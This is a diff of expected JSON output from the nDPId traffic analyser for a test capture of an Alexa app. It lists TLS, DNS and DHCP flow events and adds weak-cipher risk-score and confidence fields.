-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1490976115835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"ts_msec":1490976115835,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWl5AAEARM0CsECrYrBAqAW\/GADUAQT0E1ZsBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"}
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1490976115901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1490976115901,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl30tAAEARrkKsECoBrBAq2AA1b8YAUeVS1ZuBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIQAENu8YtA=="}
-00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976115901,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.180"}}
+00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976115901,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.180"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115905,"flow_last_seen":1490976115905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976115905,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1490976115905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976115905,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JUVAAEAG7uusECrYNu8YtJKvAbsZEE7TAAAAAKAC\/\/+4mQAAAgQFtAQCCAoA9muWAAAAAAEDAwg="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976116084,"flow_last_seen":1490976116084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976116084,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1490976116084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976116084,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8uXBAAEAGWsCsECrYNu8YtJKwAbtgAdLYAAAAAKAC\/\/\/tjwAAAgQFtAQCCAoA9muoAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1490976116119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976116119,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcfNAAOcG+0g27xi0rBAq2AG7kq+qRjf5GRBO1HASH\/5e8QAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1490976116121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976116121,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJUZAAEAG7v6sECrYNu8YtJKvAbsZEE7UqkY3+lAQAVepYgAA"}
-00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1490976116248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976116248,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwirZAAOcG4oU27xi0rBAq2AG7krCs\/eb6YAHS2XASH\/7iQAAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1490976116249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976116249,"pkt":"AMDKkaPvePiC0\/vCCABFAAAouXFAAEAGWtOsECrYNu8YtJKwAbtgAdLZrP3m+1AQAVcssgAA"}
-00649{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
